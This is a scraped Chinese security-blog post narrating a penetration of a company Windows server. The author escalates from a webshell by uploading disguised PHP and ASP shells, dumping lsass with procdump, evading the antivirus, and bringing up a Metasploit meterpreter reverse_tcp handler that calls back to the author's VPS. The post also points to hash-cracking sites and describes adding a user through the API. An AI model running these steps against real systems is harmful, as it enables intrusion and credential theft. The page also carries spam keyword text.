<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    繞過不能執行大部分系統命令和微軟殺毒

    VSole2022-07-17 06:12:18

    公司項目,全程打碼,已經拿下webshell,提權。

    看不到任何系統里面的文件,執行系統

    懷疑是webshell的問題,隨便傳了一個txt可以訪問,直接傳一個大馬。  

    其實傳上去的很多大馬或者小馬都是這個界面,可以訪問但是根本是連接不上的。

    最后找了很早之前的神盾加密的Php馬,才能正常訪問。而且有的馬還會被殺。

    不知道為啥看不了conf里面的db.php文件。然后翻了下有個Mysql目錄可以udf提權。 

    找到Mysql里面的user.myd文件,拼接hash值(40位),可以正常解密。雖然花費了1塊錢。  

    然后利用網上的udf.php很多都不行。只能放棄,考慮別的方法。  

    無意中發現,php禁止的其實都屬于php函數,但是asp和aspx跟php是不同的。

    傳asp、 aspx大馬訪問都是500,傳了一個asp的冰蝎。。算是可以了。

    可以正常執行命令,感覺還算是有點戲。接著執行其他命令。。。我傻了。。。

    我真的還是很佩服管理員的,這也是很秀了,進程、端口、所屬權限、wmic、powershell都不能執行。。  

    直接nmap掃下吧。  

    之前在服務器也看到了tomcat目錄  

    其實之前看到這個目錄了,但是看端口被注釋了,眼花看錯了。。。

    也是執行不了,但是tomcat做降權應該還是比較少的。生成一個cs馬上去直接被殺。

    然后穿了一個procdump64.exe直接導出一個lsass.dmp文件,但是本地mimikatz導入

    出了一點問題。既然能執行exe程序,就還能玩。

    傳個net.exe net1.exe等試試。  

    可惜并不行,導出注冊表啥的肯定也不行,因為reg是不能執行的。有殺軟很多還不傳。只能bypass這個殺軟,雖然不知道是啥。 

    生成一個hex文件,然后把gsl64.exe傳上去。  


    use exploit/multi/handler
    set payload windows/x64/meterpreter/reverse_tcp
    set lhost `vps ip`set lport 6666
    exploit ‐j
    

    正常上線。首先肯定是先看看進程和端口信息

    結合前面的進程發現mstsc的遠程端口改為了9833,也就是3389的反轉。  因為2012系統之后需要修改注冊表,這臺正好。。。沒有修改。只能抓取Hash破解。

    用戶還是有幾個,正好都去破解下,很不幸。。都解不開。

    破解hash網站
    https://www.objectif‐securite.ch/ophcrack
    https://www.cmd5.com/
    

    所以只能添加個系統賬號登錄進去,但是net和net1都不能用,知道有一個不依賴net和net1來添加用戶而是用api加用戶,所有我去電腦翻了下,找到一個。  

    傳上去試試。

    在meterpreter執行下hashdump看看有沒有添加成功。

    還是有點麻煩的。。。再見。

    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    公司項目,全程打碼,已經拿下webshell,提權。最后找了很早之前的神盾加密的Php馬,才能正常訪問。找到Mysql里面的user.myd文件,拼接hash值(40位),可以正常解密。無意中發現,php禁止的其實都屬于php函數,但是aspaspx跟php是不同的。
    用戶名:加密密碼:密碼最后一次修改日期:兩次密碼的修改時間間隔:密碼有效期:密碼修改到期到的警告天數:密碼過期之后的寬限天數:賬號失效時間:保留。查看下pid所對應的進程文件路徑,
    這里建議doc文檔,圖片可以貼的詳細一些。爆破完好了,一樣的6。想給它一個清晰完整的定義其實是非常困難的。
    一、漏洞挖掘的前期–信息收集 雖然是前期,但是卻是我認為最重要的一部分; 很多人挖洞的時候說不知道如何入手,其實挖洞就是信息收集+常規owasp top 10+邏輯漏洞(重要的可能就是思路猥瑣一點),這些漏洞的測試方法本身不是特別復雜,一般混跡在安全圈子的人都能復現漏洞。接下來我就著重說一下我在信息收集方面的心得。
    涉及系統命令調用執行的函數在接收用戶的參數輸入時未做檢查過濾,或者攻擊者可以通過編碼及其他替換手段繞過安全限制注入命令串,導致執行攻擊指定的命令。
    SQL注入速查表
    2022-07-29 09:22:37
    現在僅支持MySQL、Microsoft SQL Server,以及一部分ORACLEPostgreSQL。大部分樣例都不能保證每一個場景都適用。現實場景由于各種插入語、不同的代碼環境以及各種不常見甚至奇特的SQL語句,而經常發生變化。
    ?上整理的?試問題?全,有些 HW ?試的題,已經收集好了,提供給?家。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类